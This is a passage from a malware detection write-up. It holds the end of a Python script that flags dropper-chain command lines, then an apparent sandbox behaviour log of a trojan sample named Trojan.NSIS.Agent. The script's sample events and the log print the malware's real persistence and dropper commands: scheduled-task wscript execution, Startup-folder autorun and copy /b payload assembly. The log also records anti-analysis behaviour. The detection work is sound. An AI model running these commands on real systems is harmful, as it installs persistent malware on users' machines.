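    # ping -n N 127.0.0.1 : sleep without a sleep binary
    ("ping_sleep",
     re.compile(r'\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\b', re.I)),
    # schtasks /create ... /tr "wscript //B '<x>.js'" ... /sc minute
    ("schtasks_wscript_persistence",
     re.compile(r'\bschtasks(?:\.exe)?\b.*/create.*/tr\s+".*wscript\s+//B'
                r'.*\.js.*".*/sc\s+minute', re.I)),
    # echo [InternetShortcut] > ...\Startup\<x>.url : Startup-folder autorun
    ("startup_url_persistence",
     re.compile(r'echo\s+\[InternetShortcut\]\s*>.*\\Startup\\[^"]+\.url', re.I)),
]


def av_names_probed(cmdline):
    """Return the known AV image names a findstr /I command line is looking for."""
    m = FINDSTR_RE.search(cmdline)
    if not m:
        return set()
    return {tok.lower() for tok in m.group(1).split()} & AV_PROCESS_NAMES


def classify(cmdline):
    """Return the set of stage tags a single command line triggers."""
    tags = {tag for tag, rx in RULES if rx.search(cmdline)}
    if av_names_probed(cmdline):
        tags.add("av_process_discovery")
    return tags


def summarize(cmdlines):
    """Map each detected tag to the indices of the command lines that raised it."""
    hits = {}
    for i, cl in enumerate(cmdlines):
        for tag in classify(cl):
            hits.setdefault(tag, []).append(i)
    return hits


def is_dropper_chain(cmdlines, min_stages=3):
    """True when at least min_stages distinct stages appear in one session.

    Individually copy /b, ping -n and even a .pif are noisy; several of them
    together in one process tree are a strong signal. The threshold of 3 is an
    assumption for this example, not a value from the report.
    """
    return len(summarize(cmdlines)) >= min_stages


# Constructed sample: the report's command lines plus three benign look-alikes.
SAMPLE_EVENTS = [
    r'"C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit',
    r'tasklist',
    r'findstr /I "wrsa.exe opssvc.exe"',
    r'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"',
    r'cmd /c md 1181',
    r'findstr /V "MasBathroomsCompoundInjection" Participants',
    r'cmd /c copy /b Terminal + Involve + Experiencing + Borders + Deborah + Flip 1181\Y',
    r'1181\Buffer.pif 1181\Y',
    r'ping -n 5 127.0.0.1',
    r'''cmd /c schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F''',
    r'''cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & echo URL="C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url" & exit''',
    r'findstr /I "error" C:\logs\server.log',   # benign: no AV image names
    r'ping -n 2 8.8.8.8',                        # benign: not a localhost sleep
    r'schtasks /query /tn "Indeed"',             # benign: no /create
]

if __name__ == "__main__":
    for tag, idx in sorted(summarize(SAMPLE_EVENTS).items()):
        print(f"{tag:32s} events {idx}")
    print("dropper chain:", is_dropper_chain(SAMPLE_EVENTS))
```

Feed it the CommandLine field of each process-creation event in a session (same host and logon, or the tree under one cmd.exe parent) rather than the whole log; the per-session threshold is what separates this pattern from an administrator who happens to run copy /b or ping -n once.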
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static file information: File size 1111060 > 1048576
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00475FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 18_2_00475FC8
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004C02D8 push cs; retn 004Bh 18_2_004C0318
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00490DE6 push ecx; ret 18_2_00490DF9
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048DC7C push AA004CCFh; iretd 18_2_0048DC87
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004402D8 push cs; retn 0043h 26_2_00440318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00410DE6 push ecx; ret 26_2_00410DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040D145 push esp; retf 0003h 26_2_0040D146
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0162CC8B push ecx; retf 26_2_0162CC92
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01644EA6 push cs; iretd 26_2_01644EA7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0162F5A3 push ebp; iretd 26_2_0162F5A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01643A9E push 7F9E0B01h; retf 26_2_01643AAB

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif File created: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Indeed" /tr "wscript //B 'C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduSpark.url
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_005026DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 18_2_005026DD
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_0048FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 18_2_0048FC7C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_004826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 26_2_004826DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0040FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 26_2_0040FC7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Window / User API: threadDelayed 2789
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif API coverage: 0.9 %
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif TID: 7552 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif TID: 7560 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Thread sleep count: Count: 2789 delay: -10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00406739 FindFirstFileW,FindClose, 0_2_00406739
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405AED
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 18_2_004DE472
